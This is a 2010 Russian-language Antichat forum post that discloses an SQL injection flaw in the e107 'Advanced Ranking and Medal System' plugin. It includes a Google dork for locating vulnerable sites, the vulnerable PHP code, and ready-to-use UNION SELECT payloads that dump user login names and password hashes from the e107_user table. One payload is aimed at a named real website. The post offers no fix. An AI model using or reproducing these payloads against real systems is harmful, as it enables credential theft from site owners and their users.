02.05.2010, 20:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
1
Advanced Ranking and Medal System v1.5 by MikeNL
21:44 31-Jan-10
скачать
SQL inj
гугл- inurl:e107_plugins/advmedsys
[path]/e107_plugins/advmedsys/advmedsys_view.php
PHP код:
...require_once("../../class2.php");
require_once(HEADERF);
//-----------------------------------------------------------------------------------------------------------+
//-----------------------------------------------------------------------------------------------------------+
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
$lan_file = e_PLUGIN."advmedsys/languages/".e_LANGUAGE.".php";
require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."advmedsys/languages/English.php");
//-----------------------------------------------------------------------------------------------------------+
if ($action == "main" || $action == "") {...
PHP код:
...if ($action == "det")
{
$width = "width:100%";
$text .= "
<div style='text-align:center'>
<br><a href='advmedsys_view.php'><center>[ ".AMS_VIEW_S9." ]</center></a><br>
<table style='".$width."' class='fborder' cellspacing='0' cellpadding='0'>
<tr>
<td style='width:80px' class='forumheader3'><center>".AMS_VIEW_S1."</td>
<td style='width:100%' class='forumheader3'>".AMS_VIEW_S2."</td>
</tr>";
$sql->db_Select("advmedsys_medals", "*", "WHERE medal_id = $sub_action","");
$row = $sql->db_Fetch();
$text .= "
<tr>
<td style='width:80px' class='forumheader3'><img src='medalimg/".$row['medal_pic']."' alt = '".AMS_VIEW_S1."'></img></td>
<td style='width:100%; vertical-align:middle' class='forumheader3'>".$row['medal_name']."</td>
</tr>
</table>
<br></br>...
Далее по коду 2-d order inj.
Результат:
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,concat_ws(0x3a,user_loginname,user_password),3,4 from e107_user limit 0,1
пример:
http://www.truescap.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*! and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user*/
Последний раз редактировалось Strilo4ka; 02.05.2010 в 21:00..
|
|
|